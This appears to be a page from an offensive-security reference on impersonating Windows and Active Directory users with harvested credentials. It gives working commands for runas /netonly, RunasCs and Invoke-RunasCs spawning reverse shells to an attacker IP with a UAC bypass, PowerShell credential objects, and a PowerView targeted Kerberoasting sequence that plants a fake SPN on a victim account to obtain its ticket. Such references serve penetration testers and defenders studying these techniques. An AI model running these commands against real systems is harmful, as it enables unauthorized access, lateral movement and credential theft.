Impersonation

On windows or Active Directory environments, when credentials are found (through dumping or cracking for instance), attackers try to use them to obtain access to new resources. Depending on the harvested credential material type, the impersonation can be done in different ways.

LM or NT password hash: pass-the-hash
RC4 Kerberos key (i.e. NT hash): overpass-the-hash
non-RC4 Kerberos key (i.e. DES or AES): pass-the-key (alias for overpass-the-hash)
Kerberos ticket: pass-the-ticket
plaintext password: the techniques listed below

RunAs is a standard Windows command that allows to execute a program under a different user account. When stuffing an Active Directory account's password, the /netonly flag must be set to indicate the credentials are to be used for remote access only.

runas /netonly /user:$DOMAIN\$USER "powershell.exe"

Since the password cannot be supplied as an argument, the session must be interactive.

RunAsCs is a C# version of RunAs. It may be very handy on environements without the native RunAs.exe.

#RunAs locally 
RunasCs.exe $USERNAME $PASSWORD $Command -d $DOMAIN

#RunAs and spawn a revers shell and bypass UAC
RunasCs.exe $USERNAME $PASSWORD cmd.exe -d $DOMAIN -r $ATTACKING_IP:$PORT --bypass-uac

Or, we may use the powershell version

#RunAs and spawn a revers shell
. .\Invoke-RunasCs.ps1
Invoke-RunasCs -Username $USERNAME -Password $PASSWORD -Domain $DOMAIN -Command $CMD -Remote $ATTACKING_IP:$PORT

In Powershell, it is possible to impersonate a user by create a credential object and supplying it with the -Credential argument in the next command.

# Credential object creation (prompted)
$credential = Get-Credential

# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)

# Usage
Start-Process Notepad.exe -Credential $credential

Most of PowerView's functions have the -Credential, -Domain and -Server parameters that can be used to explicitly specify the user to run as, the target Domain and and the target Domain Controller. Just like the previous "Powershell" tab, the -Credential option has to be supplied with a credential object.

Here is an example for targeted Kerberoasting.

# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)

# Usage
Set-DomainObject -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistant/BLAHBLAH'}
$User = Get-DomainUser -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' 'victimuser'
$User | Get-DomainSPNTicket -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' | fl

SharpLdapWhoami can then be used to make sure the user is correctly impersonated. A standard whoami command will only return the local user rights, not the users impersonated during remote operations (like LDAP queries to the DC).

.\SharpLdapWhoami.exe
.\SharpLdapWhoami.exe /method:kerberos /all

Last updated 9 months ago